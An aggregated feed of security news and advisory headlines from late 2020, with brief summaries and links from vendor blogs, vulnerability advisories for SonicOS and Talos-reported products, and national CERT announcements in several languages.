How to Be Resilient to Data Theft
2020-10-13T04:00:00Z | 1602561600

Page Integrity Manager is now PCI compliant -- a strong starting point to harden your web applications

https://www.akamai.com/blog/trends/how-to-be-resilient-to-data-theft
What's New in Web Security
2020-10-13T04:00:00Z | 1602561600

With Akamai's web security portfolio, the top focus this October is on the web application firewall (WAF), with exciting new capabilities: API Discovery and Adaptive Security Profiles.

https://www.akamai.com/blog/security/whats-new-in-web-security
API Discovery and Profiling -- Visibility to Protection
2020-10-13T04:00:00Z | 1602561600

APIs have become a dominant mechanism in the modern web, allowing organizations to create powerful web and mobile experiences, while exposing back-end data and logic to create new and innovative offerings.

https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection
Latinex Month and Our Culture
2020-10-13T04:00:00Z | 1602561600

Eleven months ago, I joined Akamai as a result of the acquisition of a company I was partner of. The former company was small compared to Akamai, but had operations in several countries in the region, from Argentina to Mexico. In this company, we had been working with Akamai for 17 years, but on November 1, 2019, we officially became a part of the family.

https://www.akamai.com/blog/culture/latinex-month-and-our-culture-by-claudio-baumann
Allen-Bradley Flex IO 1794-AENT/B ENIP Request Path Logical Segment Denial of Service Vulnerability
2020-10-13T00:00:00Z | 1602547200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1006
Allen-Bradley Flex IO 1794-AENT/B ENIP Request Path Port Segment Denial of Service Vulnerability
2020-10-13T00:00:00Z | 1602547200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1005
AMD ATIKMDAG.SYS D3DKMTEscape handler Denial of Service Vulnerability
2020-10-13T00:00:00Z | 1602547200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1102
Allen-Bradley MicroLogix 1100 programmable logic controller systems IPv4 denial-of-service vulnerability
2020-10-13T00:00:00Z | 1602547200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1057
Allen-Bradley Flex IO 1794-AENT/B ENIP Request Path Data Segment Denial of Service Vulnerability
2020-10-13T00:00:00Z | 1602547200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1007
Visualize Visitor Prioritization in Real Time with mPulse
2020-10-12T13:00:00Z | 1602507600

The internet has become one of the most important access points in our daily lives. Unexpected surges in demand can slow web pages and create service outages for unprepared websites. A poor user experience leads to dissatisfied customers, making it more critical than ever to visualize and control online performance.

https://www.akamai.com/blog/security/visualize-visitor-prioritization-in-real-time-with-mpulse
SonicOS SSLVPN login page administrator username enumeration vulnerability
2020-10-12T09:53:58Z | 1602496438

SonicOS SSLVPN login page allows a remote unauthenticated attacker to perform firewall management administrator username enumeration based on the server responses. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, and SonicOSv 6.5.4.v. CVE: CVE-2020-5143 Last updated: Oct. 20, 2020, 9:53 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0018
SonicOS SSLVPN Stored cross-site scripting (XSS) vulnerability
2020-10-12T09:50:40Z | 1602496240

A stored cross-site scripting (XSS) vulnerability exists in the SonicOS SSLVPN web interface. A remote unauthenticated attacker is able to store and potentially execute arbitrary JavaScript code in the firewall SSLVPN portal. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5142 Last updated: Oct. 20, 2020, 9:50 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0017
SonicOS SSLVPN allows unauthenticated attacker to brute force Virtual Assist ticket ID
2020-10-12T09:48:22Z | 1602496102

A vulnerability in SonicOS allows a remote unauthenticated attacker to brute force Virtual Assist ticket ID in the firewall SSLVPN service. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5141 Last updated: Oct. 20, 2020, 9:48 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0016
SonicOS SSLVPN service unauthenticated malicious HTTP request leads to memory addresses leak
2020-10-12T09:43:33Z | 1602495813

A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service by sending a malicious HTTP request that leads to memory addresses leak. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5140 Last updated: Oct. 20, 2020, 9:43 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0015
SonicOS SSLVPN service unauthenticated release of Invalid pointer to cause Denial of Service (DoS) vulnerability and leads to firewall crash
2020-10-12T09:40:46Z | 1602495646

A vulnerability in SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS) due to the release of Invalid pointer and leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5139 Last updated: Oct. 20, 2020, 9:40 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0014
SonicOS SSLVPN unauthenticated Heap Overflow vulnerability allows a remote attacker to cause Denial of Service (DoS)
2020-10-12T09:18:23Z | 1602494303

A Heap Overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to SonicOS crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, and SonicOSv 6.5.4.v. CVE: CVE-2020-5138 Last updated: Oct. 20, 2020, 9:18 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0013
SonicOS SSLVPN unauthenticated buffer overflow leads to firewall crash
2020-10-12T09:15:11Z | 1602494111

A buffer overflow vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5137 Last updated: Oct. 20, 2020, 9:15 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0012
SonicOS SSLVPN and Virtual assist service authenticated buffer overflow leads to firewall crash
2020-10-12T09:10:16Z | 1602493816

A buffer overflow vulnerability in SonicOS allows an authenticated attacker to cause Denial of Service (DoS) in the SSL-VPN and virtual assist portal, which leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5136 Last updated: Oct. 20, 2020, 9:10 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0011
Denial of Service (DoS) vulnerability in the SonicOS due to buffer overflow and potentially execute arbitrary code
2020-10-12T09:04:38Z | 1602493478

A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5135 Last updated: Oct. 20, 2020, 9:04 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010
SonicOS out-of-bound invalid file reference leads to firewall crash
2020-10-12T09:00:21Z | 1602493221

A vulnerability in SonicOS allows an authenticated attacker to cause out-of-bound invalid file reference leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5134 Last updated: Oct. 20, 2020, 9 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0009
Unauthenticated Denial of Service (DoS) vulnerability in the SonicOS due to buffer overflow leads to firewall crash
2020-10-12T08:56:14Z | 1602492974

A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service due to buffer overflow, which leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3 and SonicOSv 6.5.4.v. CVE: CVE-2020-5133 Last updated: Oct. 20, 2020, 8:56 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0008
Measuring and Improving Core Web Vitals
2020-10-12T04:00:00Z | 1602475200

Google recently announced a proposed update to its search ranking algorithm: the Page Experience Update. This change, which launches in 2021, includes more performance signals in the ranking algorithm. A subtle but important feature of the update is that AMP will no longer be a requirement for promotion to Top Stories -- fast pages are all you need!

https://www.akamai.com/blog/performance/measuring-improving-core-web-vitals
What's New in Edge Delivery
2020-10-12T04:00:00Z | 1602475200

Welcome to day two of the Akamai Platform Update! Today, we're focusing on Akamai's edge delivery products as well as other complimentary products that help drive great digital experiences. The last several months have been nothing short of unprecedented as lockdowns, quarantines, and other protective measures enacted by governments and organizations drove a sudden and dramatic shift in user behavior, which in turn has driven enormous traffic levels. Akamai's importance has never been more evident as companies continue to rely on the intelligent edge platform to maintain business continuity and support the unprecedented traffic demand from online audiences. Regardless of the type of content, be it websites, apps, APIs, video, software, or smaller objects, Akamai's comprehensive set of content delivery products -- including Ion, Adaptive Media Delivery, and Download Delivery -- are designed to deliver great digital experiences for every user, regardless of location, device, or network.

https://www.akamai.com/blog/performance/whats-new-in-delivery
Timers, Metrics, and Dimensions: What's New for mPulse in 2020
2020-10-12T04:00:00Z | 1602475200

The October 2020 release marks the culmination of a large number of updates to mPulse, Akamai's real user monitoring (RUM) solution:

https://www.akamai.com/blog/performance/timers-metrics-and-dimensions-whats-new-in-mpulse-in-2020
Three Cloud-First Akamai Initiatives for Your Cloud Journey
2020-10-12T04:00:00Z | 1602475200

According to a 2020 State of the Cloud Report, 61% of organizations plan to focus on cloud migration this year and 93% have a multi-cloud strategy. This means that on average your organization is using 2.2 public clouds, multiplying your complexity and costs.

https://www.akamai.com/blog/news/three-cloud-first-akamai-initiatives-to-support-your-cloud-journey
Preparing the Edge for a Big Year in Live Streaming
2020-10-12T04:00:00Z | 1602475200

Next year is shaping up to be a big one for live streaming. Typically characteristic of even years, when many major international sporting events take place, 2021 looks like it could defy the trend. Akamai is predicting an unprecedented surge in live streaming that will start in late 2020 and continue throughout 2021. During this stretch, we could realistically see 50 million people concurrently streaming a single live event. That's roughly double the largest number of viewers we've seen during a single event in the past. With this in mind, Akamai has used much of 2020 to prepare new capabilities included in the Akamai Platform Update that will help customers prepare for this surge in live streaming.

https://www.akamai.com/blog/edge/preparing-the-edge-for-a-big-year-in-live-streaming
Edgeworkers Use Story: Creating High-Performing, Individualized Campaign Responses in Online Retail
2020-10-11T21:00:00Z | 1602450000

As campaigns and digital experiences become more individualized, they can create a challenge for delivering content to consumers at the highest velocity. Having each paid search, social media, and email marketing campaign add unique query string parameters to requests is critical for tracking the ROI of a company's marketing spend. This pursuit of granular user data can place a stubborn limit on the ability of B2C companies to maximize the benefits of cached content -- particularly in terms of maximizing offload of content delivery.

https://www.akamai.com/blog/developers/edgeworkers-use-story-creating-high-performing-individualized-campaign-responses
The Spinoff Network Challenge: Cloning or Rethinking?
2020-10-11T11:23:08Z | 1602415388

In our business, we see a common theme of large enterprises that are spinning off divisions or business units (BUs). The BUs consist of thousands of employees and numerous locations and applications that require a solid networking and security infrastructure. The CIO of the BU has basically two options: clone the parent infrastructure or forge... The post The Spinoff Network Challenge: Cloning or Rethinking? appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-spinoff-network-challenge-cloning-or-rethinking/
Computing at the Edge
2020-10-11T04:00:00Z | 1602388800

Welcome to the Akamai October 2020 Update - a week of product updates, new features, and innovations. We'll be highlighting a different area of our portfolio each day this week. In today's post, we look at our enhanced edge computing capabilities and how they help developers more effectively and rapidly improve customer experiences on the Akamai platform.

https://www.akamai.com/blog/edge/computing-at-the-edge
Detecting Iterator Invalidation with CodeQL
2020-10-09T12:30:22Z | 1602246622

Iterator invalidation is a common and subtle class of C++ bugs that often leads to exploitable vulnerabilities. During my Trail of Bits internship this summer, I developed Itergator, a set of CodeQL classes and queries for analyzing and discovering iterator invalidation. Results are easily interpretable by an auditor, […]

https://blog.trailofbits.com/2020/10/09/detecting-iterator-invalidation-with-codeql/
PrivacyRaven Has Left the Nest
2020-10-08T12:00:36Z | 1602158436

If you work on deep learning systems, check out our new tool, PrivacyRaven—it’s a Python library that equips engineers and researchers with a comprehensive testing suite for simulating privacy attacks on deep learning systems. Because deep learning enables software to perform tasks without explicit programming, it’s become ubiquitous in […]

https://blog.trailofbits.com/2020/10/08/privacyraven-has-left-the-nest/
SASE: Networking and Security Architecture for the post COVID-19 World
2020-10-07T14:43:52Z | 1602081832

The post SASE: Networking and Security Architecture for the post COVID-19 World appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-networking-and-security-architecture-for-the-post-covid-19-world/
WarezTheRemote: Turning Remotes into Listening Devices
2020-10-07T13:00:00Z | 1602075600

Television remotes have gotten little attention as a potential attack vector ? despite being one of the most common household devices you can find.

https://www.akamai.com/blog/security/wareztheremote-turning-remotes-into-listening-devices
Death by a Thousand Cuts: Nuisance DDoS Attacks in the Games Industry
2020-10-07T04:00:00Z | 1602043200

At Akamai, we talk a lot about DDoS attacks. It's because we're pretty good at handling them. We've stopped many of the world's biggest attacks. And, while less common, they get a lot of attention. But we can also stop the world's smallest attacks. And we stop lots of them. It's these smaller attacks that we're talking about today.

https://www.akamai.com/blog/security/death-by-a-thousand-cuts-nuisance-ddos-attacks-in-the-games-industry
AMD ATIKMDAG.SYS D3DKMTCreateAllocation handler denial-of-service vulnerability
2020-10-07T00:00:00Z | 1602028800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1119
We Hacked Apple for 3 Months: Here’s What We Found
2020-10-07T00:00:00Z | 1602028800

Between the period of July 6th to October 6th myself, Brett Buerhaus, Ben Sadeghipour, Samuel Erb, and Tanner Barnes worked together and hacked on the Apple bug bounty program.

https://samcurry.net/hacking-apple
RIA kvartaliülevaate teemad: kaval troojalane möllab Eesti kasutajate arvutites ning HOIA äpp on turvaline
2020-10-06T08:42:39Z | 1601973759

Rohkem kui saja Eesti kasutaja arvuti nakatus Emoteti Trooja viirusega. Pahavara, mis tekitab ligipääsu kasutaja arvutile edasiste rünnakute läbiviimiseks, mõjutas Eesti kaubandus-, transpordi- ja ehitusettevõtteid ning ühte väiksemat valitsusasutust. Lisaks soovitab Riigi infosüsteemi amet (RIA) koroonaviiruse leviku piiramiseks alla laadida HOIA rakenduse ning uuendada ka oma nutiseadet.

https://ria.ee/uudised/ria-kvartaliulevaate-teemad-kaval-troojalane-mollab-eesti-kasutajate-arvutites-ning-hoia
Have it the Old Way or Enjoy the SASE Way
2020-10-06T07:55:19Z | 1601970919

The post Have it the Old Way or Enjoy the SASE Way appeared first on Cato Networks.

https://www.catonetworks.com/resources/have-it-the-old-way-or-enjoy-the-sase-way/
Active exploitation of the critical Zerologon vulnerability has begun
2020-10-05T12:20:10Z | 1601900410

Microsoft rolled out a patch to fix the extremely critical Zerologon vulnerability (CVE-2020-1472) as part of its security updates in August. A month later, the method used to exploit the vulnerability was made public, and a number of attack tools have been published as a result. The first exploitation attempts against the vulnerability have now been detected, and an increase in the number of attacks is considered likely.

https://www.kyberturvallisuuskeskus.fi/en/news/active-exploitation-critical-zerologon-vulnerability-has-begun
Active exploitation of the critical Zerologon vulnerability has begun
2020-10-05T12:20:10Z | 1601900410

Microsoft rolled out a patch to fix the extremely critical Zerologon vulnerability (CVE-2020-1472) as part of its security updates in August. A month later, the method used to exploit the vulnerability was made public, and a number of attack tools have been published as a result. The first exploitation attempts against the vulnerability have now been detected, and an increase in the number of attacks is considered likely.

https://www.kyberturvallisuuskeskus.fi/en/news/active-exploitation-critical-zerologon-vulnerability-has-begun
#tietoturvatorstai - Get to grips with everyday information security with the help of our experts
2020-10-05T12:16:57Z | 1601900217

How do scam phone calls work? What is multi-factor authentication? Over the autumn months, we will be publishing a series of videos in which our experts discuss ways to improve information security in our everyday lives. Watch the videos on our social media channels every Thursday by following the hashtag #tietoturvatorstai.

https://www.kyberturvallisuuskeskus.fi/en/news/tietoturvatorstai-get-grips-everyday-information-security-help-our-experts
The Newest Cisco Vulnerabilities Demonstrate All That’s Wrong with Today’s Patching Processes
2020-10-05T08:08:25Z | 1601885305

Last month’s security advisories published by the Cisco Security reveals several significant vulnerabilities in Cisco IOS and IOS XE software. Overall, there were 28 high impact and 13 medium impact vulnerabilities in these advisories, with a total 46 new CVEs. All Cisco products running IOS were impacted, including IOS XR Software, NX-OS Software, and RV160... The post The Newest Cisco Vulnerabilities Demonstrate All That’s Wrong with Today’s Patching Processes appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-newest-cisco-vulnerabilities-demonstrate-all-thats-wrong-with-todays-patching-processes/
The Hybrid Workforce: Planning for The New Working Reality Post COVID-19
2020-10-05T04:26:26Z | 1601871986

It may be difficult to remember, but not so long ago we used to work mainly from an office. The unprecedented global pandemic that took the world by storm, changed our personal and professional life patterns. We moved to work from home, then returned to the office, and back home, with the ebbs and flows... The post The Hybrid Workforce: Planning for The New Working Reality Post COVID-19 appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-hybrid-workforce-planning-for-the-new-working-reality-post-covid-19/
SASE: Networking and Security Architecture for the post COVID-19 World
2020-10-04T12:43:01Z | 1601815381

The post SASE: Networking and Security Architecture for the post COVID-19 World appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-35
Levinumad küberturvalisust puudutavad müüdid ettevõtjate seas
2020-10-02T06:52:32Z | 1601621552

Ajal, mil enamus infost on talletatud digitaalsetes keskkondades, võib küberrünnak täielikult peatada firma tegevuse. Ehkki Eesti ettevõtjate teadlikkus küberohtudest kasvab, ringleb jätkuvalt müüte, mis pärsivad tõese ettekujutuse tekkimist küberrünnakutest ja nendega kaasnevatest ohtudest. Riigi Infosüsteemi Ameti küberintsidentide käsitlemise osakonna CERT-EE juht Tõnu Tammer tõi rahvusvahelise küberturvalisuse kuu alguse puhul välja neli levinud müüti ja kummutas need.

https://ria.ee/uudised/levinumad-kuberturvalisust-puudutavad-muudid-ettevotjate-seas
RIA tähistab küberturvalisuse kuud
2020-10-01T09:58:09Z | 1601546289

Juba kaheksandat aastat tähistatakse Euroopas oktoobris küberturvalisuse kuud, mille eesmärk on suurendada Euroopa Liidu inimeste teadlikkust võrguturvalisusest. Sel aastal pöörab RIA IT-vaatliku kampaaniaga erilist tähelepanu ettevõtete küberturvalisusele.

https://ria.ee/uudised/ria-tahistab-kuberturvalisuse-kuud
The European Cybersecurity Month is here again!
2020-10-01T06:39:34Z | 1601534374

October will see cybersecurity take centre stage as the European Cybersecurity Month (ECSM) will be upon us once again. The European Union's annual campaign is meant for us all, and will feature prominently on Traficom's website and social media channels. Let’s make sure we all have the skills to stay secure online!

https://www.kyberturvallisuuskeskus.fi/en/news/european-cybersecurity-month-here-again
The European Cybersecurity Month is here again!
2020-10-01T06:39:34Z | 1601534374

October will see cybersecurity take centre stage as the European Cybersecurity Month (ECSM) will be upon us once again. The European Union's annual campaign is meant for us all, and will feature prominently on Traficom's website and social media channels. Let’s make sure we all have the skills to stay secure online!

https://www.kyberturvallisuuskeskus.fi/en/news/european-cybersecurity-month-here-again
NVIDIA D3D10 driver nvwgf2umx_cfg.dll nvwg MOV_SAT code execution vulnerability
2020-09-30T00:00:00Z | 1601424000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1034
NVIDIA D3D10 Driver nvwgf2umx_cfg.dll nvwg DCL_CONSTANT_BUFFER code execution vulnerability
2020-09-30T00:00:00Z | 1601424000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1038
Apple Safari/Webkit aboutBlankURL() code execution vulnerability
2020-09-30T00:00:00Z | 1601424000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1124
NVIDIA D3D10 driver nvwgf2umx_cfg.dll nvwg MUL code execution vulnerability
2020-09-30T00:00:00Z | 1601424000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1037
NVIDIA D3D10 driver nvwgf2umx_cfg.dll nvwg MOV code execution vulnerability
2020-09-30T00:00:00Z | 1601424000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1035
Emoteti pahavaraga kaasneb ka andmevargus
2020-09-28T11:23:29Z | 1601292209

Maailmas aktiivselt leviv ja augustis taas Eestisse jõudnud Emoteti pahavaravõrgustik võib kaasa tuua ka andmelekke ning Euroopa Liidu andmekaitseseaduse (GDPR) tahtmatu rikkumise.

https://ria.ee/uudised/emoteti-pahavaraga-kaasneb-ka-andmevargus
RIS infokiri – september 2020
2020-09-28T06:01:16Z | 1601272876

Infokirjas on juttu riiklikust postkastist, X-tee iseteeninduskeskkonnast, teenustest vestlus ja sahver ning koodivaramust, nõusolekuteenusest, riigivõrgu uuest magistraalvõrgust, portaalist id.ee, infoturbe haldamisest, koroonahaigetega kokkupuutunuid abistavast kõnerobotist ning #bürokratist.

https://ria.ee/uudised/ris-infokiri-september-2020
Security Alert (A20-09-08): Multiple Vulnerabilities in FortiGate and FortiOS
2020-09-28T04:00:00Z | 1601265600

FortiNet released security advisories to address multiple vulnerabilities in FortiGate and FortiOS software.

https://www.govcert.gov.hk/en/alerts_detail.php
August Cyber Weather Marked by First Autumn Rains
2020-09-25T13:33:16Z | 1601040796

The cyber weather for August was rainy. The NCSC-FI published a warning regarding the Emotet malware strain, which remains in effect. August saw many return to work after the summer holiday season, contributing to a spike in the number of information security notifications received by the NCSC-FI. Other factors behind the surge in the number of reported security threats and violations include the long-standing increase in scams and phishing.

https://www.kyberturvallisuuskeskus.fi/en/news/august-cyber-weather-marked-first-autumn-rains
August Cyber Weather Marked by First Autumn Rains
2020-09-25T13:33:16Z | 1601040796

The cyber weather for August was rainy. The NCSC-FI published a warning regarding the Emotet malware strain, which remains in effect. August saw many return to work after the summer holiday season, contributing to a spike in the number of information security notifications received by the NCSC-FI. Other factors behind the surge in the number of reported security threats and violations include the long-standing increase in scams and phishing.

https://www.kyberturvallisuuskeskus.fi/en/news/august-cyber-weather-marked-first-autumn-rains
Security Alert (A20-09-07): Multiple Vulnerabilities in Cisco Products
2020-09-25T04:00:00Z | 1601006400

Cisco released security advisories to address multiple vulnerabilities in Cisco products running Cisco IOS and IOS XE.

https://www.govcert.gov.hk/en/alerts_detail.php
My Journey to Akamai and Back
2020-09-24T04:00:00Z | 1600920000

As a region, it's very diverse and dynamic, with a lot to experience. Although I'm based in the Beijing office, I have opportunities to collaborate closely with my colleagues in Japan, India, Singapore and Australia. We find synergies and uniqueness in each market, and constantly share ideas and best practices. It's fun, but it's also an enriching learning experience to live and work in such an exciting region.

https://www.akamai.com/blog/culture/my-journey-to-akamai-and-back-wentao-li-senior-technical
Já se encontra disponível o Boletim 4/2020 do Observatório de Cibersegurança
2020-09-24T00:00:00Z | 1600905600

Nesta edição mostra-se o decréscimo no número de incidentes registados pelo CERT.PT a partir do período habitual de férias e dá-se uma atenção particular ao malware enquanto ameaça menos visível do que o phishing, mas não menos importante.De destacar ainda que, como é habitual, o boletim também divulga publicações de interesse sobre outros aspetos da cibersegurança considerados relevantes nos últimos meses. Pode aceder ao documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/624/ja-se-encontra-disponivel-o-boletim-42020-do-observatorio-de-ciberseguranca
FIRST POST: Autumn 2020
2020-09-24T00:00:00Z | 1600905600

2020-2022 Board Announced. Welcoming a new board member – Shawn Richardson. FIRST reveals its new Vision and Mission. FIRST 32nd Annual Conference – Virtual Edition. Tips on how to publish your ideas in peer-reviewed journals. Code of Conduct – A Reminder. Infrastructure update. Have you read our new Annual Report yet?

https://www.first.org/newsroom/newsletters/FIRST_autumn_2020.pdf
Security Alert (A20-09-06): Multiple Vulnerabilities in Firefox
2020-09-23T04:00:00Z | 1600833600

Mozilla has published two security advisories (MFSA 2020-42 and MFSA 2020-43) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Azure Sphere Pluton SIGN_WITH_TENANT_ATTESTATION_KEY memory corruption vulnerability
2020-09-23T00:00:00Z | 1600819200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1139
Microsoft Azure Sphere Littlefs truncate information disclosure vulnerability
2020-09-23T00:00:00Z | 1600819200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1130
Aveva eDNA Enterprise data historian CHaD.asmx multiple SQL injection vulnerabilities
2020-09-23T00:00:00Z | 1600819200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1106
Microsoft Azure Sphere Normal World application PACKET_MMAP unsigned code execution vulnerability
2020-09-23T00:00:00Z | 1600819200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1134
Microsoft Azure Sphere Littlefs Quota denial of service vulnerability
2020-09-23T00:00:00Z | 1600819200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1129
FIRST jointly honors Ian Cook and Don Stikvoort in The Incident Response Hall of Fame awards
2020-09-23T00:00:00Z | 1600819200

The awards celebrate outstanding contribution to the Incident Response community and cyber security

https://www.first.org/newsroom/releases/20200923
FIRST jointly honors Ian Cook and Don Stikvoort in The Incident Response Hall of Fame awards
2020-09-23T00:00:00Z | 1600819200

The awards celebrate outstanding contribution to the Incident Response community and cyber security

https://www.first.org/newsroom/releases/20200923
Smart DNS for the New Network Edge
2020-09-22T04:00:00Z | 1600747200

People depend on the internet for just about everything: interacting, learning, transacting, traveling, working, and more. At the same time, the wireless evolution to 4G -- and soon 5G and Wi-Fi everywhere -- has given birth to an era of connected cars, smart sensors, and a multitude of other "things" that are growing rapidly and expanding in utility and scope. Leading network providers see new market opportunities with new business models to monetize new services that combine networks and commerce, including:

https://www.akamai.com/blog/performance/smart-dns-for-the-new-network-edge
Thought SD-WAN Was What You Needed to Transform your Network? Think Again.
2020-09-21T06:01:04Z | 1600668064

Since its premier over a decade ago, SD-WAN was adopted by enterprises as the go-to-technology for preparing their network for the digital transformation. At the time this made sense, as SD-WAN brought important advantages: Optimized bandwidth costs, by leveraging inexpensive services like Internet broadband whenever possible. Improved cloud and Internet performance, by sending traffic directly... The post Thought SD-WAN Was What You Needed to Transform your Network? Think Again. appeared first on Cato Networks.

https://www.catonetworks.com/blog/thought-sd-wan-was-what-you-needed-to-transform-your-network-think-again/
How to Start Growing and Never Stop
2020-09-21T04:00:00Z | 1600660800

My heritage is Sri Lankan. But, at the age of 15 I moved to France as a refugee, fleeing a civil war. Starting a new life from scratch in France, without speaking French, was certainly an interesting journey. But I was lucky enough to have support from my parents. They lived by the mantra of "when there's a will, there's a way". And that helped get me into the French education system, where I completed high school and University, before moving to the UK to start my professional career in IT.

https://www.akamai.com/blog/culture/how-to-start-growing-and-never-stop-gobi-tarmat-director
SonicWall Email Security Product version ES 10.0.7 and Comprehensive Anti-Spam Service 10.0.7 release discloses "BCC" email addresses in the email header
2020-09-18T21:33:28Z | 1600464808

SonicWall On-premise Email Security (ES) 10.0.7, Hosted Email Security (HES) 10.0.7 products and Comprehensive Anti-Spam Service 10.0.7 release allow recipients of emails to potentially view the email addresses included in the “BCC” line if the recipient clicks on the header information of the email. CVE: N/A Last updated: Sept. 18, 2020, 9:33 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0007
Networks solve cyber security challenges together
2020-09-18T11:33:53Z | 1600428833

Even though everything looks good on paper, the operations models for cyber security crises are often incomplete. In practice, the operations models transcend organisational borders within the partner network. National Cyber Security Centre Finland Deputy Director-General Kalle Luukkainen hopes that more top executives from companies would join the network.

https://www.kyberturvallisuuskeskus.fi/en/news/networks-solve-cyber-security-challenges-together
Networks solve cyber security challenges together
2020-09-18T11:33:53Z | 1600428833

Even though everything looks good on paper, the operations models for cyber security crises are often incomplete. In practice, the operations models transcend organisational borders within the partner network. National Cyber Security Centre Finland Deputy Director-General Kalle Luukkainen hopes that more top executives from companies would join the network.

https://www.kyberturvallisuuskeskus.fi/en/news/networks-solve-cyber-security-challenges-together
Safe Bluetooth usage on smart devices
2020-09-18T11:27:13Z | 1600428433

The Finnish app designed to trace coronavirus exposure helps stop transmission chains and slow down the spreading of the coronavirus. The tracing is based on Bluetooth Low Energy (BLE) technology: the devices detect proximity to each other based on the intensity of the BLE signals. This article addresses the assumptions and questions people have about the information security risks related to using Bluetooth.

https://www.kyberturvallisuuskeskus.fi/en/news/safe-bluetooth-usage-smart-devices
Office 365 data breaches on the rise – protect yourself, observe and notify!
2020-09-18T11:25:21Z | 1600428321

Office 365 user accounts in several Finnish companies have been breached. New data breaches are reported daily. National Cyber Security Centre Finland urges all Office 365 customers to use two-factor authentication and limit the use of e-mail forwarding rules.

https://www.kyberturvallisuuskeskus.fi/en/news/office-365-data-breaches-rise-protect-yourself-observe-and-notify
Office 365 data breaches on the rise – protect yourself, observe and notify!
2020-09-18T11:25:21Z | 1600428321

Office 365 user accounts in several Finnish companies have been breached. New data breaches are reported daily. National Cyber Security Centre Finland urges all Office 365 customers to use two-factor authentication and limit the use of e-mail forwarding rules.

https://www.kyberturvallisuuskeskus.fi/en/news/office-365-data-breaches-rise-protect-yourself-observe-and-notify
August möödus Eesti küberruumis pahavara sisaldavate dokumentide ja e-kirjade tähe all
2020-09-18T10:39:14Z | 1600425554

Suve viimasel kuul saime teada, et vähemalt sadakond Eesti meilikontot nakatus pahavaraga, mis teeb ukse lahti teistele ohtlikele viirustele ja pahavaradele. Saime ka teateid terviseametit matkivatest ja koroonapandeemiat ära kasutavatest võltskirjadest, mis olid loomulikult pahavaraga varustatud.

